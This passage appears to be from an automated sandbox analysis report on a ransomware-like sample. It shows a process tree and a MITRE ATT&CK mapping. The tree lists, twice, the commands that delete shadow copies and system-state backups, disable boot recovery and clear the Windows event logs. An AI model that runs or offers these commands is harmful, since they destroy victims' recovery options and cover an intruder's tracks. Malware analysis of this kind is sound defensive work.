- - C:\Windows\system32\cmd.exe
    /c vssadmin Delete Shadows /All /Quiet
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2892
  - - C:\Windows\system32\vssadmin.exe
      vssadmin Delete Shadows /All /Quiet
      4⤵
      Interacts with shadow copies
      PID:5272
- - C:\Windows\system32\cmd.exe
    /c bcdedit /set {default} recoveryenabled No
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3040
  - - C:\Windows\system32\bcdedit.exe
      bcdedit /set {default} recoveryenabled No
      4⤵
      Modifies boot configuration data using bcdedit
      PID:4460
- - C:\Windows\system32\cmd.exe
    /c bcdedit /set {default} bootstatuspolicy ignoreallfailures
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4940
  - - C:\Windows\system32\bcdedit.exe
      bcdedit /set {default} bootstatuspolicy ignoreallfailures
      4⤵
      Modifies boot configuration data using bcdedit
      PID:2624
- - C:\Windows\system32\cmd.exe
    /c wbadmin DELETE SYSTEMSTATEBACKUP
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:472
  - - C:\Windows\system32\wbadmin.exe
      wbadmin DELETE SYSTEMSTATEBACKUP
      4⤵
      Deletes System State backups
      PID:3000
- - C:\Windows\system32\cmd.exe
    /c wbadmin DELETE SYSTEMSTATEBACKUP -deleteOldest
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3056
  - - C:\Windows\system32\wbadmin.exe
      wbadmin DELETE SYSTEMSTATEBACKUP -deleteOldest
      4⤵
      Deletes System State backups
      PID:5392
- - C:\Windows\system32\cmd.exe
    /c wmic SHADOWCOPY /nointeractive
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:5340
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic SHADOWCOPY /nointeractive
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:1252
- - C:\Windows\system32\cmd.exe
    /c wevtutil cl security
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3020
  - - C:\Windows\system32\wevtutil.exe
      wevtutil cl security
      4⤵
      Clears Windows event logs
      PID:3636
- - C:\Windows\system32\cmd.exe
    /c wevtutil cl system
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4792
  - - C:\Windows\system32\wevtutil.exe
      wevtutil cl system
      4⤵
      Clears Windows event logs
      PID:1560
- - C:\Windows\system32\cmd.exe
    /c wevtutil cl application
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2512
  - - C:\Windows\system32\wevtutil.exe
      wevtutil cl application
      4⤵
      Clears Windows event logs
      PID:4968
- - C:\Windows\system32\cmd.exe
    /c vssadmin Delete Shadows /All /Quiet
    3⤵
    PID:1852
  - - C:\Windows\system32\vssadmin.exe
      vssadmin Delete Shadows /All /Quiet
      4⤵
      Interacts with shadow copies
      PID:3904
- - C:\Windows\system32\cmd.exe
    /c bcdedit /set {default} recoveryenabled No
    3⤵
    PID:5976
  - - C:\Windows\system32\bcdedit.exe
      bcdedit /set {default} recoveryenabled No
      4⤵
      Modifies boot configuration data using bcdedit
      PID:5080
- - C:\Windows\system32\cmd.exe
    /c bcdedit /set {default} bootstatuspolicy ignoreallfailures
    3⤵
    PID:4060
  - - C:\Windows\system32\bcdedit.exe
      bcdedit /set {default} bootstatuspolicy ignoreallfailures
      4⤵
      Modifies boot configuration data using bcdedit
      PID:3000
- - C:\Windows\system32\cmd.exe
    /c wbadmin DELETE SYSTEMSTATEBACKUP
    3⤵
    PID:1660
  - - C:\Windows\system32\wbadmin.exe
      wbadmin DELETE SYSTEMSTATEBACKUP
      4⤵
      Deletes System State backups
      Drops file in Windows directory
      PID:5796
- - C:\Windows\system32\cmd.exe
    /c wbadmin DELETE SYSTEMSTATEBACKUP -deleteOldest
    3⤵
    PID:4700
  - - C:\Windows\system32\wbadmin.exe
      wbadmin DELETE SYSTEMSTATEBACKUP -deleteOldest
      4⤵
      Deletes System State backups
      PID:4260
- - C:\Windows\system32\cmd.exe
    /c wmic SHADOWCOPY /nointeractive
    3⤵
    PID:3020
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic SHADOWCOPY /nointeractive
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:3204
- - C:\Windows\system32\cmd.exe
    /c wevtutil cl security
    3⤵
    PID:4992
  - - C:\Windows\system32\wevtutil.exe
      wevtutil cl security
      4⤵
      Clears Windows event logs
      PID:5164
- - C:\Windows\system32\cmd.exe
    /c wevtutil cl system
    3⤵
    PID:1100
  - - C:\Windows\system32\wevtutil.exe
      wevtutil cl system
      4⤵
      Clears Windows event logs
      PID:4272
- - C:\Windows\system32\cmd.exe
    /c wevtutil cl application
    3⤵
    PID:2040
  - - C:\Windows\system32\wevtutil.exe
      wevtutil cl application
      4⤵
      Clears Windows event logs
      PID:4904

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2684

C:\Windows\system32\wbengine.exe
"C:\Windows\system32\wbengine.exe"
1⤵
PID:2312

C:\Windows\System32\vdsldr.exe
C:\Windows\System32\vdsldr.exe -Embedding
1⤵
PID:4428

C:\Windows\System32\vds.exe
C:\Windows\System32\vds.exe
1⤵
- Checks SCSI registry key(s)
PID:5472

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

Windows Management Instrumentation

T1047

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Direct Volume Access

T1006

Indicator Removal

T1070

Clear Windows Event Logs

T1070.001

File Deletion

Modify Registry

T1112

Credential Access

Discovery

Peripheral Device Discovery

T1120

Query Registry

System Information Discovery

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Inhibit System Recovery